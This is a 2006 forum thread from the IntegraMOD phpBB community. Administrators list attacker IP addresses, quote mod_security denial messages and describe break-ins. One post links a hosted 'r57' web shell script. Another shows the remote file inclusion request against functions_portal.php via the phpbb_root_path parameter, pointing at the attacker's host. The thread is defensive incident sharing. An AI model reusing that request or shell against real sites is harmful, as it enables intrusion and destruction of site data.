IntegraMOD

Home of phpBB Integrated Modifications
https://integramod.com/forum/

Hacker IPs

https://integramod.com/forum/viewtopic.php?f=53&t=2160

Page 1 of 1

Hacker IPs

PostPosted: Sun Sep 24, 2006 9:01 pm
Author: computerz
Here are some of the IPs my mod_security picked up for hacking attempts, in case anyone is interested (not sure if these are NAT addresses are not, so ban at your own risk)

125.142.222.104
159.53.110.141
194.29.192.53
195.169.140.32
200.1.211.89
202.146.253.4
209.209.22.230
210.193.231.34
213.115.205.82
222.124.209.36
222.124.222.17
222.124.224.104
222.124.224.119
24.162.201.79
65.60.71.130
66.98.168.100
67.107.177.135
68.44.92.243
69.46.0.68
71.242.108.97
84.166.30.242

Each hack recorded for the above listed IP addresses, results in one of the following responses from mod_security:
  • Access denied with code 406. Error parsing POST parameters: Error normalising parameter value: Invalid URL encoding detected: not enough characters
  • Access denied with code 406. Error processing request body: Multipart: final boundary missing
  • Access denied with code 406. Pattern match "phpbb_root_path" at THE_REQUEST

PostPosted: Tue Sep 26, 2006 1:47 pm
Author: billmcelligott
190.40.57.188

200.106.106.1

http://www.estilosperu.com/joe/r57.txt
Hacked today by above

what we need is something to stop them getting in.

PostPosted: Tue Sep 26, 2006 1:54 pm
Author: ZacFields
I think everyone should post their hacker IP's so that we all can ban them. I think that would be a good step to take.

Zac

PostPosted: Tue Sep 26, 2006 3:59 pm
Author: computerz
^^ or make a shared ban-list script. The script would connect to a source list of IPs and automatically include them in your database. The soruce list can be updated automatically from each persons website.

But then you'd have integrity issues

Re: Hacker IPs

PostPosted: Wed Sep 27, 2006 1:23 am
Author: Musher
More:
85.96.83.210
85.97.115.21
88.226.36.123

PostPosted: Mon Oct 02, 2006 4:09 pm
Author: foxyone
forum got hacked this week... i was actually on the forum as it was being hacked and caught these 2 ips

81.213.243.190
85.102.116.111

PostPosted: Tue Oct 03, 2006 7:36 am
Author: suicico
i banned the proxys. using the .htaaccess file
usually they use proxies .. so .. those ips USUALLY are not hackers ips

PostPosted: Sun Oct 08, 2006 9:49 am
Author: billmcelligott
85.137.4.127
81.181.15.6
200.172.242.39
195.140.142.113
147.202.64.162

includes/proxy.tgz

file inserted

Re: Hacker IPs

PostPosted: Sat Oct 21, 2006 3:40 am
Author: netimpact
I was hacked by 81.192.177.10. How he did it was doing a search from yahoo that target "Integaramod portal"
http://search.yahoo.com/search?ei=UTF-8&p=integramod+portal&fr=FP-pull-web-t&b=71


Next he did a POST /includes/functions_portal.php?phpbb_root_path=http://xxx to his web site and all my files are gone <img>

How possible he did it???

How?

PostPosted: Sat Oct 21, 2006 5:45 am
Author: Musher
"suicico";p="16067" wrote:i banned the proxys. using the .htaaccess file
usually they use proxies .. so .. those ips USUALLY are not hackers ips


How do you do (write) that?

/c

PostPosted: Sat Oct 21, 2006 7:33 pm
Author: netimpact
two more IPs from Maroc Telecom and Turkey found

81.192.239.156
81.213.98.151
I am banning users from Marocoo and Turkey
All times are UTC - 8 hours
Page 1 of 1
Powered by phpBB® Forum Software © phpBB Group
https://www.phpbb.com/